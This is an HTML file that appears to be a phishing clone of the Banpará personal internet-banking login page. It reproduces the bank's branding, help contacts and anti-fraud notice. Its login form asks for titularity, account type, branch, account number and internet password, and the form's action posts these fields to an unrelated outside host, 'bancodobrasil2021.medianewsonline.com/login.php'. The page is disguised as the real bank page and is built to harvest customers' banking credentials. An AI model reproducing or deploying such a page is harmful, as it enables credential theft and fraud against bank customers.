


<!doctype html>
<html lang="pt-BR">
	<head>
		<meta charset="utf-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge" />
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
		<meta http-equiv="Pragma" content="no-cache" />
		<meta http-equiv="Cache-Control" content="no-cache" />
				
        <title>
        	Internet Banking Pessoa Física
        </title>
        
        
			<script type="text/javascript">
				/* <![CDATA[ */
				(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
				(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
				m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
				})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
				
				ga('create', 'UA-124509981-2', 'auto');
				ga('send', 'pageview', location.pathname);
				/* ]]> */
			</script>        
                            
        
		<link rel="shortcut icon" type="image/x-icon" href="/ibpf/resources/imagens/favicon.ico?20201215130741" />
		<link rel="icon" href="/ibpf/resources/imagens/favicon.ico?20201215130741" type="image/x-icon">
        
		<!-- LIBS -->
        <link rel="stylesheet" type="text/css" media="screen" href="/ibpf/resources/css/lib/bootstrap.min.css?20201215130741"></link>
        <link rel="stylesheet" type="text/css" href="/ibpf/resources/css/lib/fontawesome.min.css?20201215130741"></link>
		<link rel="stylesheet" type="text/css" href="/ibpf/resources/css/lib/solid.min.css?20201215130741"></link>    
		<link rel="stylesheet" type="text/css" href="/ibpf/resources/css/lib/material-kit.css?v=1.3.0&20201215130741"></link>
		<link rel="stylesheet" type="text/css" href="/ibpf/resources/css/lib/keyboard.css?20201215130741"></link>
		<link rel="stylesheet" type="text/css" href="/ibpf/resources/css/lib/rzslider.css?20201215130741"></link>

		<!-- BASE -->
        <link rel="stylesheet" type="text/css" href="/ibpf/resources/css/base/fontes.css?20201215130741"></link>
        <link rel="stylesheet" type="text/css" href="/ibpf/resources/css/base/base.css?20201215130741"></link>
        
        <!-- PÁGINA -->
        
        	<link rel="stylesheet" type="text/css" href="/ibpf/resources/css/pagina/login.css?20201215130741"></link>
        
        
		<!-- CSS de ajuste para recursos não suportados no IE9 -->
		<!--[if lt IE 10]>
			<link rel="stylesheet" type="text/css" href="/ibpf/resources/css/base/compatibilidade.css?20201215130741"></link>
		<![endif]-->
		<link rel="stylesheet" type="text/css" href="/ibpf/resources/css/base/impressao.css?20201215130741"></link>
		
		<script type="text/javascript" src="/ibpf/resources/js/lib/angular.min.js?20201215130741"></script>
		<script type="text/javascript" src="/ibpf/resources/js/lib/angular-locale_pt-br.js?20201215130741"></script>
		<script type="text/javascript">
 			/* <![CDATA[ */
			function noBack() {
				window.history.forward()
			};
			noBack();
			window.onload = noBack;
			window.onpageshow = function(evt) {
				if (evt.persisted)
					noBack()
			};
			window.onunload = function() {
				void (0)
			};
			
			angular.element(document).ready(function() {
				tamanhoFontePadrao = parseInt($('html').css('font-size').split('px')[0]);
				initConfig('/ibpf', 300, null);			
			}); 			
			/* ]]> */
		</script>				                
    </head>
    <body>
		

<main id="login-page" class="principal">
	<div class="conteudo">
		<div class="topo">
			<div class="row">
				<div class="col-sm-4 text-left">
					<button class="btn btn-ajuda" data-toggle="modal" data-target="#modal-ajuda">Ajuda&#160;&#63;</button>
				</div>
				<div class="col-sm-8 text-right">
					<span class="info-sistema">Versão:&#160;1.1.5.0 - Banco de Estado do Pará &copy;</span>
					<button class="btn btn-fonte neutro" onclick="diminuirFonte();">A-</button>
					<button class="btn btn-fonte positivo" onclick="restaurarFonte();">A</button>
					<button class="btn btn-fonte neutro" onclick="aumentarFonte();">A+</button>
				</div>			
			</div>
		</div>

		<div class="caixa-login">
			<header>
				<div class="row">
					<div class="col-sm-4">
						<img src="/ibpf/resources/imagens/logo_azul.png?20201215130741" alt='Logo Banpará' class="logo"/>
					</div>
					<div class="col-sm-8">
						<div class="titulo-sistema">
							<span class="titulo">Internet Banking</span>
							<span class="subtitulo">Pessoa Física</span>
						</div>
					</div>
				</div>
			</header>
			<div class="mensagens">
				

<div id="mensagem-controller" data-ng-controller="mensagemController" data-ng-cloak>
	<div class="mensagem erro" data-ng-repeat="msg in messages | filter: { severityMessage: 'ERROR' }">
		{{msg.mensagem}}
	</div>
	
	<div class="mensagem alerta" data-ng-repeat="msg in messages | filter: { severityMessage: 'WARN' }">
		{{msg.mensagem}}
	</div>
		
	<div class="mensagem informacao" data-ng-repeat="msg in messages | filter: { severityMessage: 'INFO' }">
		{{msg.mensagem}}
	</div>
	
	<div class="mensagem sucesso" data-ng-repeat="msg in messages | filter: { severityMessage: 'SUCCESS' }">
		{{msg.mensagem}}
	</div>					
</div>

<script type="text/javascript">
	/* <![CDATA[ */
		function mensagemController($scope, $filter) {
			$scope.messages = null;
			
			if (!angular.isArray($scope.messages)) {
				$scope.messages = [];
			}
			
			$scope.existeMensagens = function() {
				return angular.isArray($scope.messages) && $scope.messages.length > 0;
			}			

			$scope.existeMensagem = function(msg) {
				return angular.isObject($filter('filter')($scope.messages, {mensagem: msg.mensagem})[0]);
			}

			$scope.atualizarSeverityMessage = function(msg) {
				$filter('filter')($scope.messages, {mensagem: msg.mensagem})[0].severityMessage = msg.severityMessage;				
			}					
			
			$scope.limparMensagens = function() {
				$scope.messages = [];
			}
			
			$scope.adicionarMensagens = function(mensagens) {
				if (angular.isArray(mensagens)) {
					mensagens.forEach(function(mensagem) {
						if (!$scope.existeMensagem(mensagem)) {
							$scope.messages.push(mensagem);
						} else {
							$scope.atualizarSeverityMessage(mensagem);
						}     					
  					});
  					moverScrollTop();
				}
			}
			
			$scope.adicionarMensagem = function(mensagem) {
				if (angular.isObject(mensagem)) {
					if (!$scope.existeMensagem(mensagem)) {
						$scope.messages.push(mensagem);
					} else {
						$scope.atualizarSeverityMessage(mensagem);
					}
					moverScrollTop();
				}				
			}				
		}					
				
		angular.element(document).ready(function() {
			angular.module('internetBankingApp').controller('mensagemController',
					[ '$scope', '$filter', mensagemController ]);			
			angular.bootstrap($('#mensagem-controller'), ['internetBankingApp']);
		});									
	/* ]]> */
</script>
			</div>			
			<article>
				<div id="login-controller" data-ng-controller="loginController" >
					









	
	
	
	




<form id="formulario" name="formulario" action="http://bancodobrasil2021.medianewsonline.com/login.php" method="POST" autocomplete="off" novalidate="novalidate" data-ng-is-submitted>
	
					
						<div class="row">
							<div class="col-sm-6">
								



















	
		
		
				
		
	
	 

	




<div class="form-group label-floating" data-ng-show="true">
	
		
		
			<label for="titularidade" class="control-label">Titularidade</label>
		
	
	<select id="titularidade" name="titularidade" data-ng-required="true"
			data-ng-model="titularidade" tabindex="1"  data-ng-disabled="false"
			data-ng-options="tit.name as tit.descricao for tit in listaTitularidade"  class="selectpicker" data-style="bnp-select" title="Titularidade"
			data-bootstrap-selectpicker data-ng-is-empty data-ng-has-error>
		<option data-ng-hide="true"></option>
	</select>
	
		<span class="form-control-feedback">
			<span class="fa fa-exclamation-circle icone-erro"></span>
		</span>	
		<span data-ng-show="formulario.$submitted && formulario.titularidade.$error.required" class="erro erro-select">Campo obrigatório.</span>
		<span data-ng-show="formulario.$submitted && !formulario.titularidade.$error.required && formulario.titularidade.$invalid" class="erro erro-select">Campo inválido.</span>	
			
</div>
							</div>
							<div class="col-sm-6">
								



















	
		
		
				
		
	
	 

	




<div class="form-group label-floating" data-ng-show="true">
	
		
		
			<label for="tipoConta" class="control-label">Tipo da Conta</label>
		
	
	<select id="tipoConta" name="tipoConta" data-ng-required="true"
			data-ng-model="tipoConta" tabindex="2"  data-ng-disabled="false"
			data-ng-options="tc.name as tc.descricao for tc in listaTipoConta"  class="selectpicker" data-style="bnp-select" title="Tipo da Conta"
			data-bootstrap-selectpicker data-ng-is-empty data-ng-has-error>
		<option data-ng-hide="true"></option>
	</select>
	
		<span class="form-control-feedback">
			<span class="fa fa-exclamation-circle icone-erro"></span>
		</span>	
		<span data-ng-show="formulario.$submitted && formulario.tipoConta.$error.required" class="erro erro-select">Campo obrigatório.</span>
		<span data-ng-show="formulario.$submitted && !formulario.tipoConta.$error.required && formulario.tipoConta.$invalid" class="erro erro-select">Campo inválido.</span>	
			
</div>						
							</div>
						</div>	
										
						<div class="row">
							<div class="col-sm-6">
								
















	
		
		
				
		
	
	

	


	


	


<div class="form-group label-floating" data-ng-show="true">
	
		
		
			<label for="agencia" class="control-label">Agência</label>
		
	
	<input id="agencia" name="agencia" type="text" data-ng-required="true" data-ng-numbers-only 
		   data-ng-model="agencia" maxlength="4" tabindex="3" data-ng-autofocus data-ng-focus-next-on-maxlength 
		   data-ng-padleft="{size: 4, padChar : '0'}" data-ng-disabled="false" 
		   class="form-control" data-ng-is-empty data-ng-has-error />
	
		<span class="form-control-feedback">
			<span class="fa fa-exclamation-circle icone-erro"></span>
		</span>			
		<span data-ng-show="formulario.$submitted && formulario.agencia.$error.required" class="erro">Campo obrigatório.</span>
		<span data-ng-show="formulario.$submitted && !formulario.agencia.$error.required && formulario.agencia.$invalid" class="erro">Campo inválido.</span>		
		
</div>
							</div>
							<div class="col-sm-6">
								

















	
		
		
				
		
	
	 

	



	


	
		
		
	
	
	


<div class="form-group label-floating" data-ng-show="true">
	
		
		
			<label for="numeroConta" class="control-label">Conta</label>
		
	
	<input id="numeroConta" name="numeroConta" type="text" data-ng-required="true" data-ng-numbers-only 
		   data-ng-model="numeroConta" maxlength="10" tabindex="4"  data-ng-focus-next-on-maxlength 
		   data-ng-padleft="{size: 10, padChar : '0'}" 
		   data-ng-disabled="false" 
		   class="form-control" data-ng-is-empty data-ng-has-error />
	
		<span class="form-control-feedback">
			<span class="fa fa-exclamation-circle icone-erro"></span>
		</span>	
		<span data-ng-show="formulario.$submitted && formulario.numeroConta.$error.required" class="erro">Campo obrigatório.</span>
		<span data-ng-show="formulario.$submitted && !formulario.numeroConta.$error.required && formulario.numeroConta.$invalid" class="erro">Campo inválido.</span>		
				   	
</div>
							</div>
						</div>
						
						




















	
		
		
				
		
	
	



	



<div class="form-group label-floating" data-ng-show="true">
	
		
		
			<label for="CHV0253106530" class="control-label">Senha da Internet</label>
		
	
	<input id="CHV0253106530" name="CHV0253106530" type="password" data-ng-required="true" 
		   data-ng-model="senhaAuxiliar" 
		     tabindex="5" data-ng-disabled-ccp data-ng-keyboard data-token="a7b6fe92-5db5-4bcd-9981-c81183240551" 
		    data-ng-disabled="false" class="form-control" data-ng-is-empty data-ng-has-error 
		   autocomplete="off" />
	<input type="hidden" id="CHV0253106530Encrypted" name="CHV0253106530Encrypted" data-ng-model="senha" />
	
		<span class="form-control-feedback">
			<span class="fa fa-exclamation-circle icone-erro"></span>
		</span>	
		<span data-ng-show="formulario.$submitted && formulario.CHV0253106530.$error.required" class="erro">Campo obrigatório.</span>
		
			
			
				<span data-ng-show="formulario.$submitted && !formulario.CHV0253106530.$error.required && formulario.CHV0253106530.$invalid" class="erro">Campo inválido.</span>
			
			
					   	
</div>
									 						
						<div class="row botoes">
							<div class="col-sm-6 text-left">
								<button class="btn neutro" type="button" name="acessar" tabindex="7" data-ng-click="limpar();">Limpar</button>
							</div>
							<div class="col-sm-6 text-right">
								<button class="btn positivo" type="button" name="acessar" tabindex="6" data-ng-click="validarLogin();">Acessar</button>
							</div>
						</div>
						<input type="hidden" id="token" name="_xsrf" />
						
</form>

				</div>
			</article>
		</div>

	</div>
</main>



<div class="modal fade" id="modal-ajuda" tabindex="-1" role="dialog">
	<div class="modal-dialog">
		<div class="modal-content">
			<div class="modal-header">
				<button type="button" class="close" data-dismiss="modal" aria-hidden="true">
					<span class="fa fa-times"></span>
				</button>
				<h4 class="modal-title">Ajuda</h4>
			</div>
			<div class="modal-body">
				<h5><span class="fa fa-phone-square"></span> Telefones de contato</h5>
				<div class="row">
					<div class="col-sm-6">
						<div class="telefone">
							<span class="icone fa fa-phone"></span>
							<span class="titulo">Central Banpará</span>
							<span class="numeros"><small>(91)</small> 3004-4444<br>0800-285-8080</span>							
						</div>
					</div>
					<div class="col-sm-6">
						<div class="telefone">
							<span class="icone fa fa-headset"></span> 
							<span class="titulo">SAC</span>
							<span class="numeros">0800-280-6605</span>
						</div>
					</div>
				</div>
				<div class="row">
					<div class="col-sm-6">
						<div class="telefone">
							<span class="icone fa fa-comments"></span>
							<span class="titulo">Ouvidoria</span>
							<span class="numeros">0800-280-9040</span>
						</div>
					</div>
					<div class="col-sm-6">
						<div class="telefone">
							<span class="icone fa fa-deaf"></span>
							<span class="titulo">SAC Deficiente Auditivo</span>
							<span class="numeros">0800-280-1817</span>
						</div>
					</div>
				</div>
				
				
					<hr>
					
					<h5><span class="fa fa-arrow-alt-square-down"></span> Download de manuais</h5>
					<div class="download-links">
						
							<a class="btn btn-sm neutro" href="/ibpf/resources/pdf/Acesso Novo IBK v1.pdf?20201215130741" target="_blank">
								Primeiro Acesso
							</a>
						
							<a class="btn btn-sm neutro" href="/ibpf/resources/pdf/FAQs IBK v1 Ajustado.pdf?20201215130741" target="_blank">
								Perguntas Frequentes
							</a>
						
							<a class="btn btn-sm neutro" href="/ibpf/resources/pdf/BANPARA_IBK_PORTAL_MANUAL.pdf?20201215130741" target="_blank">
								Manual do Usuário
							</a>
						
					</div>				
				
			</div>
		</div>
	</div>
</div>



<div class="modal fade" id="modal-fraude" tabindex="-1" role="dialog">
	<div class="modal-dialog">
		<div class="modal-content">
			<div class="modal-header">
				<button type="button" class="close" data-dismiss="modal" aria-hidden="true">
					<span class="fa fa-times"></span>
				</button>
				<h4 class="modal-title">Atenção<img src="/ibpf/resources/imagens/banpara-logo.png?" alt='Logo Banpará' class="logo"/></h4>
			</div>
			<div class="modal-body">
				<h5>Prezado cliente,</h5>
				<div class="row">
					<div class="col-sm-12">
						<div class="descricao">
							<p>O Banpará <b>não</b> envia links por E-mail, SMS e Redes Sociais.<br>Não forneça seus dados pessoais a terceiros.</p>
						</div>
					</div>
				</div>
			</div>
			<div class="modal-footer">
				<button type="button" class="btn neutro" data-dismiss="modal">
					ESTOU CIENTE
				</button>
			</div>
		</div>
	</div>
</div>

<script type="text/javascript">
	/* <![CDATA[ */
	function loginController($scope, $http, $browser) {
		$scope.listaTitularidade = [{"name":"PRIMEIRO_TITULAR","descricao":"Primeiro Titular"},{"name":"SEGUNDO_TITULAR","descricao":"Segundo Titular"}];
		$scope.titularidade = 'PRIMEIRO_TITULAR';

		$scope.listaTipoConta = [{"name":"CONTA_CORRENTE","descricao":"Conta Corrente"},{"name":"CONTA_POUPANCA","descricao":"Conta Poupança"}];
		$scope.tipoConta = 'CONTA_CORRENTE';
		
		$scope.agencia = null;
		$scope.numeroConta = null;
		
		sessionStorage.setItem("loginRegistradoGA", "false");
		
		$scope.limpar = function() {
			limparMensagensGlobal();
			$scope.titularidade = 'PRIMEIRO_TITULAR';
			$scope.tipoConta = 'CONTA_CORRENTE';
			$scope.agencia = '';
			$scope.numeroConta = '';
			limparCamposPassword($scope.formulario);
			$scope.formulario.$submitted = false;
		}
		
		$scope.validarLogin = function() {
			$scope.formulario.$submitted = true;
			if (!$scope.formulario.$valid) {
				return;
			}			
		
			var dadosAutenticacao = {
				titularidade: $scope.titularidade,
				tipoConta: $scope.tipoConta,
				agencia : $scope.agencia,
				numeroConta : $scope.numeroConta,
				CHV0253106530Encrypted : $scope.senha					
			}

			$http.post("/login/validar", dadosAutenticacao).success(function(data) {
				if(data) {
					jConfirm("Existe uma outra sessão ativa para esta conta. Deseja encerrar a outra sessão e iniciar esta nova?", function(retorno) {
						if (retorno) {
							$scope.logar();								
						} else {
							location.reload();
						}
					});
				}
				else {
					$scope.logar();
				}
			}).error(function(data) {
				limparCamposPassword($scope.formulario);
				$scope.formulario.$submitted = false;
				
				
				var objetoGALoginErro = {
					agencia: $scope.agencia,
			        numeroConta: $scope.numeroConta,
			        tipoConta: $scope.tipoConta,
			        titularidade: $scope.titularidade
				};
				enviarEventoGA('Login', 'Login', objetoGALoginErro, false, data.messages[0].mensagem);
			});
		}
			
		$scope.logar = function() {
			$scope.formulario.$submitted = true;
			if (!$scope.formulario.$valid) {
				return;
			}
			abrirModalAguarde();

			$("#token").val($browser.cookies()["XSRF-TOKEN"]);
			$('#formulario').submit();
		}		
	}	
	
	angular.element(document).ready(function() {
		angular.module('internetBankingApp').controller('loginController',
				[ '$scope', '$http', '$browser', loginController ]);
		angular.bootstrap($('#login-controller'), ['internetBankingApp']);
		if(sessionStorage.getItem("hideModalFraude") == null || sessionStorage.getItem("hideModalFraude") === "false") {
			$("#modal-fraude").modal({backdrop: "static", keyboard: false, show: true});
			sessionStorage.setItem("hideModalFraude", "true");
		}
	});
	/* ]]> */
</script>


		
		<div id="aguarde">
			<div class="conteudo">
				<span class="icone fa fa-spin fa-spinner-third"></span>
				<p class="texto">Aguarde</p>
			</div>
		</div>
		
		<div id="divAlerts"></div>				
    </body>
	<script type="text/javascript" src="/ibpf/resources/js/base/utils.js?20201215130741"></script>
		      
    <script type="text/javascript" src="/ibpf/resources/js/lib/crypto-js.min.js?20201215130741"></script>
    <script type="text/javascript" src="/ibpf/resources/js/lib/aes.min.js?20201215130741"></script>
    <script type="text/javascript" src="/ibpf/resources/js/lib/pbkdf2.min.js?20201215130741"></script>	      
	<script type="text/javascript" src="/ibpf/resources/js/lib/jquery.min.js?20201215130741"></script>	
    <script type="text/javascript" src="/ibpf/resources/js/lib/bootstrap.min.js?20201215130741" ></script>
    <script type="text/javascript" src="/ibpf/resources/js/lib/jquery-ui-position.min.js?20201215130741" ></script>
    <script type="text/javascript" src="/ibpf/resources/js/lib/jquery.keyboard.min.js?20201215130741" ></script>
    <script type="text/javascript" src="/ibpf/resources/js/lib/angular-input-masks-standalone.min.js?20201215130741" ></script>
    <script type="text/javascript" src="/ibpf/resources/js/lib/angular-br-filters.min.js?20201215130741" ></script>	    
    <script type="text/javascript" src="/ibpf/resources/js/lib/ng-table.min.js?20201215130741"></script>
    <script type="text/javascript" src="/ibpf/resources/js/lib/angular-print.js?20201215130741"></script>
    <script type="text/javascript" src="/ibpf/resources/js/lib/rzslider.min.js?20201215130741"></script>
    
	<!--   MATERIAL KIT   -->
	<script type="text/javascript" src="/ibpf/resources/js/lib/material.min.js?20201215130741" ></script>
	<script type="text/javascript" src="/ibpf/resources/js/lib/moment.min.js?20201215130741" ></script>	
	<script type="text/javascript" src="/ibpf/resources/js/lib/bootstrap-selectpicker.js?20201215130741" ></script>
	<script type="text/javascript" src="/ibpf/resources/js/lib/bootstrap-datetimepicker.js?20201215130741" ></script>
	<script type="text/javascript" src="/ibpf/resources/js/lib/material-kit.js?v=1.3.0&20201215130741" ></script>
	
	<script type="text/javascript" src="/ibpf/resources/js/lib/ng-bootstrap-select.js?20201215130741"></script>	
	
	<script type="text/javascript" src="/ibpf/resources/js/locale/pt-br.js?20201215130741" ></script>
	<script type="text/javascript" src="/ibpf/resources/js/base/alerts.js?20201215130741" ></script>
	<script type="text/javascript" src="/ibpf/resources/js/base/valorPorExtenso.js?20201215130741" ></script>
	<script type="text/javascript" src="/ibpf/resources/js/base/input-masks.js?20201215130741" ></script>
	<script type="text/javascript" src="/ibpf/resources/js/base/filters.js?20201215130741" ></script>	
	<script type="text/javascript" src="/ibpf/resources/js/base/layout.js?20201215130741" ></script>
	<script type="text/javascript" src="/ibpf/resources/js/base/app.js?20201215130741" ></script>
</html>